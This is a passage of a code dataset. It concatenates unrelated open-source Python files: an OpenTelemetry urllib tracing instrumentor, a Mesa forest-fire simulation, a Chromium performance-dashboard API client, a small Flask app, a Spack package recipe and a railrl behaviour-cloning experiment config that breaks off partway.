                    http.client.HTTPResponse
                ``name_callback``: Callback which calculates a generic span name
                    for an outgoing HTTP request based on the method and url.
                    Optional: Defaults to get_default_span_name.
        """
        _instrument(
            tracer_provider=kwargs.get("tracer_provider"),
            span_callback=kwargs.get("span_callback"),
            name_callback=kwargs.get("name_callback"),
        )

    def _uninstrument(self, **kwargs):
        # Removes the global OpenerDirector.open patch.
        _uninstrument()

    def uninstrument_opener(
        self, opener: OpenerDirector
    ):  # pylint: disable=no-self-use
        """uninstrument_opener a specific instance of urllib.request.OpenerDirector"""
        _uninstrument_from(opener, restore_as_bound_func=True)
def get_default_span_name(method):
    """Default implementation for name_callback, returns HTTP {method_name}."""
    return ("HTTP %s" % method).strip()
def _instrument(tracer_provider=None, span_callback=None, name_callback=None):
    """Monkey-patch ``OpenerDirector.open`` so every urllib request is traced.

    Args:
        tracer_provider: optional TracerProvider; defaults to the global one.
        span_callback: optional callable invoked with (span, response) before
            the response is returned to the caller.
        name_callback: optional callable mapping (method, url) to a span name;
            falls back to get_default_span_name on a falsy/non-str result.
    """
    opener_open = OpenerDirector.open

    @functools.wraps(opener_open)
    def instrumented_open(opener, fullurl, data=None, timeout=None):
        # ``fullurl`` may be a plain URL string or a prepared Request object.
        if isinstance(fullurl, str):
            request_ = Request(fullurl, data)
        else:
            request_ = fullurl

        def get_or_create_headers():
            return getattr(request_, "headers", {})

        def call_wrapped():
            return opener_open(opener, request_, data=data, timeout=timeout)

        return _instrumented_open_call(
            opener, request_, call_wrapped, get_or_create_headers
        )

    def _instrumented_open_call(
        _, request, call_wrapped, get_or_create_headers
    ):  # pylint: disable=too-many-locals
        # Skip tracing entirely when instrumentation is suppressed (avoids
        # duplicate spans from nested instrumented calls).
        if context.get_value("suppress_instrumentation") or context.get_value(
            _SUPPRESS_URLLIB_INSTRUMENTATION_KEY
        ):
            return call_wrapped()

        method = request.get_method().upper()
        url = request.full_url

        span_name = ""
        if name_callback is not None:
            span_name = name_callback(method, url)
        if not span_name or not isinstance(span_name, str):
            span_name = get_default_span_name(method)

        labels = {
            "http.method": method,
            "http.url": url,
        }

        with get_tracer(
            __name__, __version__, tracer_provider
        ).start_as_current_span(span_name, kind=SpanKind.CLIENT) as span:
            exception = None
            if span.is_recording():
                span.set_attribute("http.method", method)
                span.set_attribute("http.url", url)

            headers = get_or_create_headers()
            # Propagate the trace context on the outgoing request headers.
            inject(type(headers).__setitem__, headers)

            # Suppress instrumentation for the duration of the real call so
            # any nested urllib use does not create duplicate spans.
            token = context.attach(
                context.set_value(_SUPPRESS_URLLIB_INSTRUMENTATION_KEY, True)
            )
            try:
                result = call_wrapped()  # *** PROCEED
            except Exception as exc:  # pylint: disable=W0703
                exception = exc
                # HTTPError carries the response body in its ``file`` attr.
                result = getattr(exc, "file", None)
            finally:
                context.detach(token)

            if result is not None:
                code_ = result.getcode()
                labels["http.status_code"] = str(code_)
                if span.is_recording():
                    span.set_attribute("http.status_code", code_)
                    span.set_attribute("http.status_text", result.reason)
                    span.set_status(Status(http_status_to_status_code(code_)))
                ver_ = str(getattr(result, "version", ""))
                if ver_:
                    # http.client reports the protocol version as e.g. 10 or
                    # 11, meaning HTTP/1.0 and HTTP/1.1. Split the digits as
                    # "major.minor". (Was ``ver_[:-1]`` for the minor digit,
                    # which mapped both 10 and 11 to "1.1".)
                    labels["http.flavor"] = "{}.{}".format(ver_[:1], ver_[1:])

            if span_callback is not None:
                span_callback(span, result)

        if exception is not None:
            raise exception.with_traceback(exception.__traceback__)
        return result

    # Mark the wrapper so _uninstrument_from can detect and undo the patch.
    instrumented_open.opentelemetry_instrumentation_urllib_applied = True
    OpenerDirector.open = instrumented_open
def _uninstrument():
    """Disables instrumentation of :code:`urllib` through this module.

    Restores the original ``OpenerDirector.open`` saved by ``_instrument``.
    Note that this only works if no other module also patches urllib."""
    _uninstrument_from(OpenerDirector)
def _uninstrument_from(instr_root, restore_as_bound_func=False):
instr_func_name = "open"
instr_func = getattr(instr_root, instr_func_name)
if not getattr(
instr_func, "opentelemetry_instrumentation_urllib_applied", False,
):
return
original = instr_func.__wrapped__ # pylint:disable=no-member
if restore_as_bound_func:
original = types.MethodType(original, instr_root)
setattr(instr_root, instr_func_name, original)
| 33.553991 | 108 | 0.665454 |
import functools
import types
from urllib.request import (
OpenerDirector,
Request,
)
from opentelemetry import context
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.urllib.version import (
__version__,
)
from opentelemetry.instrumentation.utils import http_status_to_status_code
from opentelemetry.propagate import inject
from opentelemetry.trace import SpanKind, get_tracer
from opentelemetry.trace.status import Status
_SUPPRESS_URLLIB_INSTRUMENTATION_KEY = "suppress_urllib_instrumentation"
class URLLibInstrumentor(BaseInstrumentor):
def _instrument(self, **kwargs):
_instrument(
tracer_provider=kwargs.get("tracer_provider"),
span_callback=kwargs.get("span_callback"),
name_callback=kwargs.get("name_callback"),
)
def _uninstrument(self, **kwargs):
_uninstrument()
def uninstrument_opener(
self, opener: OpenerDirector
):
_uninstrument_from(opener, restore_as_bound_func=True)
def get_default_span_name(method):
return "HTTP {}".format(method).strip()
def _instrument(tracer_provider=None, span_callback=None, name_callback=None):
opener_open = OpenerDirector.open
@functools.wraps(opener_open)
def instrumented_open(opener, fullurl, data=None, timeout=None):
if isinstance(fullurl, str):
request_ = Request(fullurl, data)
else:
request_ = fullurl
def get_or_create_headers():
return getattr(request_, "headers", {})
def call_wrapped():
return opener_open(opener, request_, data=data, timeout=timeout)
return _instrumented_open_call(
opener, request_, call_wrapped, get_or_create_headers
)
def _instrumented_open_call(
_, request, call_wrapped, get_or_create_headers
):
if context.get_value("suppress_instrumentation") or context.get_value(
_SUPPRESS_URLLIB_INSTRUMENTATION_KEY
):
return call_wrapped()
method = request.get_method().upper()
url = request.full_url
span_name = ""
if name_callback is not None:
span_name = name_callback(method, url)
if not span_name or not isinstance(span_name, str):
span_name = get_default_span_name(method)
labels = {
"http.method": method,
"http.url": url,
}
with get_tracer(
__name__, __version__, tracer_provider
).start_as_current_span(span_name, kind=SpanKind.CLIENT) as span:
exception = None
if span.is_recording():
span.set_attribute("http.method", method)
span.set_attribute("http.url", url)
headers = get_or_create_headers()
inject(type(headers).__setitem__, headers)
token = context.attach(
context.set_value(_SUPPRESS_URLLIB_INSTRUMENTATION_KEY, True)
)
try:
result = call_wrapped()
except Exception as exc:
exception = exc
result = getattr(exc, "file", None)
finally:
context.detach(token)
if result is not None:
code_ = result.getcode()
labels["http.status_code"] = str(code_)
if span.is_recording():
span.set_attribute("http.status_code", code_)
span.set_attribute("http.status_text", result.reason)
span.set_status(Status(http_status_to_status_code(code_)))
ver_ = str(getattr(result, "version", ""))
if ver_:
labels["http.flavor"] = "{}.{}".format(ver_[:1], ver_[:-1])
if span_callback is not None:
span_callback(span, result)
if exception is not None:
raise exception.with_traceback(exception.__traceback__)
return result
instrumented_open.opentelemetry_instrumentation_urllib_applied = True
OpenerDirector.open = instrumented_open
def _uninstrument():
_uninstrument_from(OpenerDirector)
def _uninstrument_from(instr_root, restore_as_bound_func=False):
instr_func_name = "open"
instr_func = getattr(instr_root, instr_func_name)
if not getattr(
instr_func, "opentelemetry_instrumentation_urllib_applied", False,
):
return
original = instr_func.__wrapped__
if restore_as_bound_func:
original = types.MethodType(original, instr_root)
setattr(instr_root, instr_func_name, original)
| true | true |
1c305749d00f258369cbc9bc8173c8553aa12dc1 | 2,363 | py | Python | benchmark/compare/Mesa/ForestFire/model.py | Corvince/Agents.jl | 6276084756287bd0a7b1e0dc9fcf5638f9840c73 | [
"MIT"
] | null | null | null | benchmark/compare/Mesa/ForestFire/model.py | Corvince/Agents.jl | 6276084756287bd0a7b1e0dc9fcf5638f9840c73 | [
"MIT"
] | null | null | null | benchmark/compare/Mesa/ForestFire/model.py | Corvince/Agents.jl | 6276084756287bd0a7b1e0dc9fcf5638f9840c73 | [
"MIT"
] | null | null | null | from mesa import Model
from mesa import Agent
from mesa.space import Grid
from mesa.time import RandomActivation
class TreeCell(Agent):
    """A single forest cell holding one tree.

    Attributes:
        pos: (x, y) grid coordinates; also used as the agent's unique_id.
        condition: one of "Fine", "On Fire", or "Burned Out".
    """

    def __init__(self, pos, model):
        """Create a healthy tree at *pos* belonging to *model*."""
        super().__init__(pos, model)
        self.pos = pos
        self.condition = "Fine"

    def step(self):
        """Burn out, first igniting any "Fine" von Neumann neighbours."""
        if self.condition != "On Fire":
            return
        for neighbour in self.model.grid.neighbor_iter(self.pos, moore=False):
            if neighbour.condition == "Fine":
                neighbour.condition = "On Fire"
        self.condition = "Burned Out"

    def get_pos(self):
        """Return the cell's grid coordinates."""
        return self.pos
class ForestFire(Model):
    """
    Simple Forest Fire model.
    """

    def __init__(self, height=100, width=100, density=0.7):
        """
        Create a new forest fire model.

        Args:
            height, width: The size of the grid to model
            density: What fraction of grid cells have a tree in them.
        """
        # Initialize model parameters
        self.height = height
        self.width = width
        self.density = density
        # Set up model objects
        self.schedule = RandomActivation(self)
        self.grid = Grid(height, width, torus=False)
        # Place a tree in each cell with Prob = density
        for (contents, x, y) in self.grid.coord_iter():
            if self.random.random() < self.density:
                # Create a tree
                new_tree = TreeCell((x, y), self)
                # Set all trees in the first column on fire.
                if x == 0:
                    new_tree.condition = "On Fire"
                # NOTE(review): _place_agent is a private Mesa API; confirm the
                # pinned Mesa version accepts the (pos, agent) argument order.
                self.grid._place_agent((x, y), new_tree)
                self.schedule.add(new_tree)
        self.running = True

    def step(self):
        """
        Advance the model by one step.
        """
        self.schedule.step()
| 29.5375 | 81 | 0.555226 | from mesa import Model
from mesa import Agent
from mesa.space import Grid
from mesa.time import RandomActivation
class TreeCell(Agent):
def __init__(self, pos, model):
super().__init__(pos, model)
self.pos = pos
self.condition = "Fine"
def step(self):
if self.condition == "On Fire":
for neighbor in self.model.grid.neighbor_iter(self.pos, moore=False):
if neighbor.condition == "Fine":
neighbor.condition = "On Fire"
self.condition = "Burned Out"
def get_pos(self):
return self.pos
class ForestFire(Model):
def __init__(self, height=100, width=100, density=0.7):
self.height = height
self.width = width
self.density = density
self.schedule = RandomActivation(self)
self.grid = Grid(height, width, torus=False)
for (contents, x, y) in self.grid.coord_iter():
if self.random.random() < self.density:
new_tree = TreeCell((x, y), self)
if x == 0:
new_tree.condition = "On Fire"
self.grid._place_agent((x, y), new_tree)
self.schedule.add(new_tree)
self.running = True
def step(self):
self.schedule.step()
| true | true |
1c305878f64477e32f999d42339c6c175de80bd6 | 7,580 | py | Python | experimental/soundwave/soundwave/dashboard_api.py | Ashish0125/Application-test | 0b642ec89bbc8de3d76b3cd782c2ae7bc0dc7bf2 | [
"BSD-3-Clause"
] | null | null | null | experimental/soundwave/soundwave/dashboard_api.py | Ashish0125/Application-test | 0b642ec89bbc8de3d76b3cd782c2ae7bc0dc7bf2 | [
"BSD-3-Clause"
] | null | null | null | experimental/soundwave/soundwave/dashboard_api.py | Ashish0125/Application-test | 0b642ec89bbc8de3d76b3cd782c2ae7bc0dc7bf2 | [
"BSD-3-Clause"
] | 1 | 2020-07-24T04:42:31.000Z | 2020-07-24T04:42:31.000Z | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import httplib2
import json
import logging
import oauth2client.client
import oauth2client.file
from oauth2client import service_account # pylint: disable=no-name-in-module
import oauth2client.tools
import os
import urllib
from py_utils import retry_util # pylint: disable=import-error
class RequestError(OSError):
    """Exception class for errors while making a request.

    Wraps the request URL, the httplib2 response dict, and the raw body so
    callers can inspect the failure; the string form includes the status and
    best-effort error message.
    """

    def __init__(self, request, response, content):
        self.request = request
        self.response = response
        self.content = content
        super(RequestError, self).__init__(
            '%s returned HTTP Error %d: %s' % (
                self.request, self.status, self.error_message))

    def __reduce__(self):
        # Method needed to make the exception pickleable [1], otherwise it causes
        # the mutliprocess pool to hang when raised by a worker [2].
        # [1]: https://stackoverflow.com/a/36342588
        # [2]: https://github.com/uqfoundation/multiprocess/issues/33
        return (type(self), (self.request, self.response, self.content))

    @property
    def status(self):
        """HTTP status code of the response, as an int."""
        return int(self.response['status'])

    @property
    def json(self):
        """The response body parsed as JSON, or None if it is not valid JSON."""
        try:
            return json.loads(self.content)
        # json.loads raises ValueError on malformed JSON and TypeError on
        # non-string input; anything broader would mask real bugs (the
        # original caught StandardError, which is also Python-2-only).
        except (TypeError, ValueError):
            return None

    @property
    def error_message(self):
        """The 'error' field of the JSON body, or the raw body as fallback."""
        try:
            # Try to find error message within json content.
            return self.json['error']
        # TypeError: body was not a JSON object (None/list); KeyError: no
        # 'error' field. Fall back to the entire content itself.
        except (TypeError, KeyError):
            return self.content
class ClientError(RequestError):
    """Exception for 4xx HTTP client errors (the request itself is at fault)."""
    pass
class ServerError(RequestError):
    """Exception for 5xx HTTP server errors (retryable dashboard failures)."""
    pass
def BuildRequestError(request, response, content):
    """Build the correct RequestError depending on the response status."""
    status = response['status']
    if status.startswith('4'):
        error_cls = ClientError
    elif status.startswith('5'):
        error_cls = ServerError
    else:
        # Fall back to the base class for anything else.
        error_cls = RequestError
    return error_cls(request, response, content)
class PerfDashboardCommunicator(object):
    """Authenticated client for the Chrome Performance Dashboard REST API.

    Supports both service-account credentials (from a JSON keyfile) and an
    interactive user OAuth2 flow.

    NOTE(review): this module uses ``urllib.urlencode``/``urllib.quote`` and
    catches ``StandardError`` elsewhere, which only exist on Python 2 —
    confirm the target interpreter before porting.
    """

    REQUEST_URL = 'https://chromeperf.appspot.com/api/'
    # OAuth2 "installed application" client; for this grant type the client
    # secret is not treated as confidential.
    OAUTH_CLIENT_ID = (
        '62121018386-h08uiaftreu4dr3c4alh3l7mogskvb7i.apps.googleusercontent.com')
    OAUTH_CLIENT_SECRET = 'vc1fZfV1cZC6mgDSHV-KSPOz'
    SCOPES = ['https://www.googleapis.com/auth/userinfo.email']

    def __init__(self, flags):
        self._credentials = None
        if flags.service_account_json:
            self._AuthorizeAccountServiceAccount(flags.service_account_json)
        else:
            self._AuthorizeAccountUserAccount(flags)

    @property
    def has_credentials(self):
        # True when credentials exist and have not been invalidated.
        return self._credentials and not self._credentials.invalid

    def _AuthorizeAccountServiceAccount(self, json_keyfile):
        """Used to create service account credentials for the dashboard.

        Args:
            json_keyfile: Path to json file that contains credentials.
        """
        self._credentials = (
            service_account.ServiceAccountCredentials.from_json_keyfile_name(
                json_keyfile, self.SCOPES))

    def _AuthorizeAccountUserAccount(self, flags):
        """Used to create user account credentials for the performance dashboard.

        Args:
            flags: An argparse.Namespace as returned by argparser.parse_args; in
                addition to oauth2client.tools.argparser flags should also have
                set a user_credentials_json flag.
        """
        store = oauth2client.file.Storage(flags.user_credentials_json)
        if os.path.exists(flags.user_credentials_json):
            # Reuse previously cached credentials when available.
            self._credentials = store.locked_get()
        if not self.has_credentials:
            # Fall back to the interactive browser-based OAuth2 flow.
            flow = oauth2client.client.OAuth2WebServerFlow(
                self.OAUTH_CLIENT_ID, self.OAUTH_CLIENT_SECRET, self.SCOPES,
                access_type='offline', include_granted_scopes='true',
                prompt='consent')
            self._credentials = oauth2client.tools.run_flow(flow, store, flags)

    @retry_util.RetryOnException(ServerError, retries=3)
    def _MakeApiRequest(self, request, params=None, retries=None):
        """Used to communicate with perf dashboard.

        Args:
            request: String with the API endpoint to which the request is made.
            params: A dictionary with parameters for the request.
            retries: Number of times to retry in case of server errors.

        Returns:
            Contents of the response from the dashboard.
        """
        del retries  # Handled by the decorator.
        assert self.has_credentials
        url = self.REQUEST_URL + request
        if params:
            url = '%s?%s' % (url, urllib.urlencode(params))
        http = httplib2.Http()
        if self._credentials.access_token_expired:
            self._credentials.refresh(http)
        http = self._credentials.authorize(http)
        logging.info('Making API request: %s', url)
        # The dashboard API expects POST requests with an empty body.
        resp, content = http.request(
            url, method='POST', headers={'Content-length': 0})
        if resp['status'] != '200':
            raise BuildRequestError(url, resp, content)
        return json.loads(content)

    def ListTestPaths(self, test_suite, sheriff):
        """Lists test paths for the given test_suite.

        Args:
            test_suite: String with test suite (benchmark) to get paths for.
            sheriff: Include only test paths monitored by the given sheriff
                rotation, use 'all' to return all test paths regardless of
                rotation.

        Returns:
            A list of test paths. Ex. ['TestPath1', 'TestPath2']
        """
        return self._MakeApiRequest(
            'list_timeseries/%s' % test_suite, {'sheriff': sheriff})

    def GetTimeseries(self, test_path, days=30):
        """Get timeseries for the given test path.

        Args:
            test_path: test path to get timeseries for.
            days: Number of days to get data points for.

        Returns:
            A dict in the format:

                {'revision_logs': {
                    r_commit_pos: {... data ...},
                    r_chromium_rev: {... data ...},
                    ...},
                 'timeseries': [
                    [revision, value, timestamp, r_commit_pos, r_webkit_rev],
                    ...
                 ],
                 'test_path': test_path}

            or None if the test_path is not found.
        """
        try:
            return self._MakeApiRequest(
                'timeseries/%s' % urllib.quote(test_path), {'num_days': days})
        except ClientError as exc:
            # An unknown test path is an expected condition, not an error.
            if 'Invalid test_path' in exc.json['error']:
                return None
            else:
                raise

    def GetBugData(self, bug_ids):
        """Yields data for a given bug id or sequence of bug ids."""
        if not hasattr(bug_ids, '__iter__'):
            bug_ids = [bug_ids]
        for bug_id in bug_ids:
            yield self._MakeApiRequest('bugs/%d' % bug_id)

    def IterAlertData(self, test_suite, sheriff, days=30):
        """Returns alerts for the given test_suite.

        Args:
            test_suite: String with test suite (benchmark) to get paths for.
            sheriff: Include only test paths monitored by the given sheriff
                rotation, use 'all' to return all test paths regardless of
                rotation.
            days: Only return alerts which are at most this number of days old.

        Yields:
            Data for all requested alerts in chunks.
        """
        min_timestamp = datetime.datetime.now() - datetime.timedelta(days=days)
        params = {
            'test_suite': test_suite,
            'min_timestamp': min_timestamp.isoformat(),
            'limit': 1000,
        }
        if sheriff != 'all':
            params['sheriff'] = sheriff
        # Follow the server-provided cursor until all pages are consumed.
        while True:
            response = self._MakeApiRequest('alerts', params)
            yield response
            if 'next_cursor' in response:
                params['cursor'] = response['next_cursor']
            else:
                return
| 32.532189 | 80 | 0.683905 |
import datetime
import httplib2
import json
import logging
import oauth2client.client
import oauth2client.file
from oauth2client import service_account
import oauth2client.tools
import os
import urllib
from py_utils import retry_util
class RequestError(OSError):
def __init__(self, request, response, content):
self.request = request
self.response = response
self.content = content
super(RequestError, self).__init__(
'%s returned HTTP Error %d: %s' % (
self.request, self.status, self.error_message))
def __reduce__(self):
return (type(self), (self.request, self.response, self.content))
@property
def status(self):
return int(self.response['status'])
@property
def json(self):
try:
return json.loads(self.content)
except StandardError:
return None
@property
def error_message(self):
try:
return self.json['error']
except StandardError:
return self.content
class ClientError(RequestError):
pass
class ServerError(RequestError):
pass
def BuildRequestError(request, response, content):
if response['status'].startswith('4'):
error = ClientError
elif response['status'].startswith('5'):
error = ServerError
else:
error = RequestError
return error(request, response, content)
class PerfDashboardCommunicator(object):
REQUEST_URL = 'https://chromeperf.appspot.com/api/'
OAUTH_CLIENT_ID = (
'62121018386-h08uiaftreu4dr3c4alh3l7mogskvb7i.apps.googleusercontent.com')
OAUTH_CLIENT_SECRET = 'vc1fZfV1cZC6mgDSHV-KSPOz'
SCOPES = ['https://www.googleapis.com/auth/userinfo.email']
def __init__(self, flags):
self._credentials = None
if flags.service_account_json:
self._AuthorizeAccountServiceAccount(flags.service_account_json)
else:
self._AuthorizeAccountUserAccount(flags)
@property
def has_credentials(self):
return self._credentials and not self._credentials.invalid
def _AuthorizeAccountServiceAccount(self, json_keyfile):
self._credentials = (
service_account.ServiceAccountCredentials.from_json_keyfile_name(
json_keyfile, self.SCOPES))
def _AuthorizeAccountUserAccount(self, flags):
store = oauth2client.file.Storage(flags.user_credentials_json)
if os.path.exists(flags.user_credentials_json):
self._credentials = store.locked_get()
if not self.has_credentials:
flow = oauth2client.client.OAuth2WebServerFlow(
self.OAUTH_CLIENT_ID, self.OAUTH_CLIENT_SECRET, self.SCOPES,
access_type='offline', include_granted_scopes='true',
prompt='consent')
self._credentials = oauth2client.tools.run_flow(flow, store, flags)
@retry_util.RetryOnException(ServerError, retries=3)
def _MakeApiRequest(self, request, params=None, retries=None):
del retries
assert self.has_credentials
url = self.REQUEST_URL + request
if params:
url = '%s?%s' % (url, urllib.urlencode(params))
http = httplib2.Http()
if self._credentials.access_token_expired:
self._credentials.refresh(http)
http = self._credentials.authorize(http)
logging.info('Making API request: %s', url)
resp, content = http.request(
url, method='POST', headers={'Content-length': 0})
if resp['status'] != '200':
raise BuildRequestError(url, resp, content)
return json.loads(content)
def ListTestPaths(self, test_suite, sheriff):
return self._MakeApiRequest(
'list_timeseries/%s' % test_suite, {'sheriff': sheriff})
def GetTimeseries(self, test_path, days=30):
try:
return self._MakeApiRequest(
'timeseries/%s' % urllib.quote(test_path), {'num_days': days})
except ClientError as exc:
if 'Invalid test_path' in exc.json['error']:
return None
else:
raise
def GetBugData(self, bug_ids):
if not hasattr(bug_ids, '__iter__'):
bug_ids = [bug_ids]
for bug_id in bug_ids:
yield self._MakeApiRequest('bugs/%d' % bug_id)
def IterAlertData(self, test_suite, sheriff, days=30):
min_timestamp = datetime.datetime.now() - datetime.timedelta(days=days)
params = {
'test_suite': test_suite,
'min_timestamp': min_timestamp.isoformat(),
'limit': 1000,
}
if sheriff != 'all':
params['sheriff'] = sheriff
while True:
response = self._MakeApiRequest('alerts', params)
yield response
if 'next_cursor' in response:
params['cursor'] = response['next_cursor']
else:
return
| true | true |
1c305941578efa97a3feb50a111824a9e892608b | 833 | py | Python | back/run.py | xiaomogui/json-databook | f7909ef1dafb76c719521cfddfdaccf847723fec | [
"Apache-2.0"
] | null | null | null | back/run.py | xiaomogui/json-databook | f7909ef1dafb76c719521cfddfdaccf847723fec | [
"Apache-2.0"
] | null | null | null | back/run.py | xiaomogui/json-databook | f7909ef1dafb76c719521cfddfdaccf847723fec | [
"Apache-2.0"
] | null | null | null | from flask import Flask, request
from flask_cors import CORS
from routes.WorkspaceRoute import workspaceRoute
from routes.BookshelfRoute import bookshelfRoute
from routes.DatabookRoute import databookRoute
app = Flask(__name__)
# Emit JSON responses as raw UTF-8 instead of \u escapes.
app.config.update(RESTFUL_JSON=dict(ensure_ascii=False))
# Allow cross-origin requests on every route (separate front-end origin).
CORS(app, resources=r'/*')
@app.route('/')
def index():
    """Root endpoint: logs the optional ``path`` query arg, returns a stub."""
    path = request.args.get("path")
    print(path)  # debug trace; consider replacing with app.logger
    return "it's a directory"
@app.route('/get-chess')
def getChess():
    """Placeholder endpoint; returns a fixed marker string.

    The ``path`` query parameter is accepted but not yet used — the dead
    local read was removed.
    """
    return "getChess"
@app.route('/img/upload', methods=['POST'])
def send_img():
    """Accept a multipart upload under the 'file' field and echo its bytes.

    NOTE(review): no explicit Content-Type is set on the response — confirm
    the client handles Flask's default.
    """
    f = request.files['file']
    imgData = f.read()
    return imgData
# Mount the feature-specific route blueprints on the application.
app.register_blueprint(workspaceRoute)
app.register_blueprint(bookshelfRoute)
app.register_blueprint(databookRoute)
# Run the development server on all interfaces when executed directly.
if __name__ == '__main__':
    app.run(host="0.0.0.0")
from flask_cors import CORS
from routes.WorkspaceRoute import workspaceRoute
from routes.BookshelfRoute import bookshelfRoute
from routes.DatabookRoute import databookRoute
app = Flask(__name__)
app.config.update(RESTFUL_JSON=dict(ensure_ascii=False))
CORS(app, resources=r'/*')
@app.route('/')
def index():
path = request.args.get("path")
print(path)
return "it's a directory"
@app.route('/get-chess')
def getChess():
path = request.args.get("path")
return "getChess"
@app.route('/img/upload', methods=['POST'])
def send_img():
f = request.files['file']
imgData = f.read()
return imgData
app.register_blueprint(workspaceRoute)
app.register_blueprint(bookshelfRoute)
app.register_blueprint(databookRoute)
if __name__ == '__main__':
app.run(host="0.0.0.0") | true | true |
1c30595d970ec0fefb3b06125454384f8076b5fb | 1,758 | py | Python | internal/notes/builtin-SAVE/packages/py-unittest2py3k/package.py | HPCToolkit/hpctest | 5ff4455582bf39e75530a31badcf6142081b386b | [
"BSD-3-Clause"
] | 1 | 2019-01-17T20:07:19.000Z | 2019-01-17T20:07:19.000Z | internal/notes/builtin-SAVE/packages/py-unittest2py3k/package.py | HPCToolkit/hpctest | 5ff4455582bf39e75530a31badcf6142081b386b | [
"BSD-3-Clause"
] | null | null | null | internal/notes/builtin-SAVE/packages/py-unittest2py3k/package.py | HPCToolkit/hpctest | 5ff4455582bf39e75530a31badcf6142081b386b | [
"BSD-3-Clause"
] | 2 | 2019-08-06T18:13:57.000Z | 2021-11-05T18:19:49.000Z | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyUnittest2py3k(PythonPackage):
"""unittest2 is a backport of the new features added to the unittest
testing framework in Python 2.7 and 3.2. This is a Python 3 compatible
version of unittest2."""
homepage = "https://pypi.python.org/pypi/unittest2py3k"
url = "https://pypi.io/packages/source/u/unittest2py3k/unittest2py3k-0.5.1.tar.gz"
version('0.5.1', '8824ff92044310d9365f90d892bf0f09')
depends_on('python@3:')
depends_on('py-setuptools', type='build')
| 43.95 | 91 | 0.683163 | true | true | |
1c3059b8ba36df157f1ad186193f2fa5012b7dbb | 2,845 | py | Python | experiments/murtaza/off_policy_ssl/gym/hopper/bc.py | Asap7772/rail-rl-franka-eval | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | [
"MIT"
] | null | null | null | experiments/murtaza/off_policy_ssl/gym/hopper/bc.py | Asap7772/rail-rl-franka-eval | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | [
"MIT"
] | null | null | null | experiments/murtaza/off_policy_ssl/gym/hopper/bc.py | Asap7772/rail-rl-franka-eval | 4bf99072376828193d05b53cf83c7e8f4efbd3ba | [
"MIT"
] | null | null | null | from railrl.torch.sac.policies import GaussianPolicy
from railrl.launchers.experiments.ashvin.awr_sac_rl import experiment
from railrl.launchers.launcher_util import run_experiment
import railrl.misc.hyperparameter as hyp
if __name__ == "__main__":
variant = dict(
num_epochs=0,
num_eval_steps_per_epoch=5000,
num_trains_per_train_loop=1000,
num_expl_steps_per_train_loop=0,
min_num_steps_before_training=0,
max_path_length=1000,
batch_size=512,
replay_buffer_size=int(1E6),
algorithm="BC",
version="normal",
collection_mode='batch',
load_demos=True,
pretrain_policy=True,
pretrain_rl=True,
layer_size=256,
num_layers=4,
trainer_kwargs=dict(
discount=0.99,
soft_target_tau=5e-3,
target_update_period=1,
policy_lr=3E-4,
qf_lr=3E-4,
reward_scale=1,
beta=1,
use_automatic_entropy_tuning=True,
bc_num_pretrain_steps=1000000,
q_num_pretrain1_steps=0,
q_num_pretrain2_steps=0,
policy_weight_decay=1e-4,
compute_bc=True,
bc_weight=1.0,
rl_weight=0.0,
bc_loss_type='mse',
pretraining_env_logging_period=10000,
do_pretrain_rollouts=True,
),
policy_kwargs=dict(
hidden_sizes=[256] * 4,
max_log_std=0,
min_log_std=-6,
),
path_loader_kwargs=dict(
demo_path='demos/hopper_action_noise_1000.npy',
),
)
search_space = {
'trainer_kwargs.use_automatic_entropy_tuning':[False],
'trainer_kwargs.bc_num_pretrain_steps':[400000],
'trainer_kwargs.bc_weight':[1],
'train_rl':[False],
'pretrain_policy':[True],
'pretrain_rl':[False],
'load_demos':[True],
'path_loader_kwargs.frac_trajs':[.002],
'env': [
'hopper',
],
'policy_class':[
GaussianPolicy,
],
}
sweeper = hyp.DeterministicHyperparameterSweeper(
search_space, default_parameters=variant,
)
n_seeds = 1
mode = 'local'
exp_prefix = 'bc_hopper_frac_trajs_sweep'
# n_seeds = 2
# mode = 'ec2'
# exp_prefix = 'bc_hopper_gym_v2'
for exp_id, variant in enumerate(sweeper.iterate_hyperparameters()):
for _ in range(n_seeds):
run_experiment(
experiment,
exp_prefix=exp_prefix,
mode=mode,
variant=variant,
num_exps_per_instance=1,
use_gpu=True,
gcp_kwargs=dict(
preemptible=False,
),
skip_wait=True,
)
| 29.635417 | 72 | 0.572935 | from railrl.torch.sac.policies import GaussianPolicy
from railrl.launchers.experiments.ashvin.awr_sac_rl import experiment
from railrl.launchers.launcher_util import run_experiment
import railrl.misc.hyperparameter as hyp
if __name__ == "__main__":
variant = dict(
num_epochs=0,
num_eval_steps_per_epoch=5000,
num_trains_per_train_loop=1000,
num_expl_steps_per_train_loop=0,
min_num_steps_before_training=0,
max_path_length=1000,
batch_size=512,
replay_buffer_size=int(1E6),
algorithm="BC",
version="normal",
collection_mode='batch',
load_demos=True,
pretrain_policy=True,
pretrain_rl=True,
layer_size=256,
num_layers=4,
trainer_kwargs=dict(
discount=0.99,
soft_target_tau=5e-3,
target_update_period=1,
policy_lr=3E-4,
qf_lr=3E-4,
reward_scale=1,
beta=1,
use_automatic_entropy_tuning=True,
bc_num_pretrain_steps=1000000,
q_num_pretrain1_steps=0,
q_num_pretrain2_steps=0,
policy_weight_decay=1e-4,
compute_bc=True,
bc_weight=1.0,
rl_weight=0.0,
bc_loss_type='mse',
pretraining_env_logging_period=10000,
do_pretrain_rollouts=True,
),
policy_kwargs=dict(
